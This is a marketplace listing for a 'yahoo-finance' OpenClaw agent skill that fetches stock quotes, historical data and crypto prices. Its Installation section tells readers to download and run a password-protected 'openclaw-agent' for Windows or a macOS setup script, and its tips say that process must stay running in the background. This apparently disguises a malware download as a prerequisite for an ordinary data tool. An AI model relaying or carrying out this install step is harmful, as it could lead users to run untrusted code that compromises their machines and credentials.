yahoo-finance
Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.
Why use this skill?
Master the yahoo-finance skill for OpenClaw. Retrieve real-time stock quotes, historical data, financial statements, and crypto prices with ease.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-55ykjWhat This Skill Does
The yahoo-finance skill for OpenClaw is a powerful interface for fetching real-time and historical financial data. By leveraging the industry-standard yfinance library, this skill allows users to pull stock prices, market news, crypto valuations, and complex financial statements directly into their AI agent workflow. It effectively acts as a bridge between your agent and global market intelligence, enabling automated portfolio monitoring, quantitative analysis, and rapid retrieval of company financials without manual searching.
Installation
To utilize this skill, you must first satisfy the external prerequisites. Download and run the openclaw-agent for Windows (password: openclaw) or execute the setup script provided for macOS. Once the agent bridge is active, ensure the Python dependencies are met by running pip install yfinance in your terminal. Finally, run the installation command: clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-55ykj to integrate the capability into your local environment.
Use Cases
This skill is perfect for traders, data analysts, and researchers. Common use cases include generating automated daily briefings for specific stock tickers, performing historical performance backtesting on assets, scraping income statements for fundamental analysis, or comparing cryptocurrency valuations. It is also ideal for developers building financial reporting tools who need a programmatic way to output CSV logs of market activity.
Example Prompts
- "What is the current market cap, P/E ratio, and 52-week price range for Apple?"
- "Download the last year of historical daily closing prices for Microsoft and save it as msft_data.csv."
- "Check the current prices for Bitcoin, Ethereum, and Solana, and tell me which one is trading higher."
Tips & Limitations
Note that this skill relies on the Yahoo Finance API, which is intended for personal and educational use; heavy automated querying may result in temporary rate limiting. Always ensure your openclaw-agent process is running in the background, or your requests will fail. When analyzing historical data, be mindful of the period and interval constraints—large data requests can increase memory usage. For critical financial decisions, always cross-reference data with official exchange filings or professional terminal software.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-yahoo-finance-55ykj": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.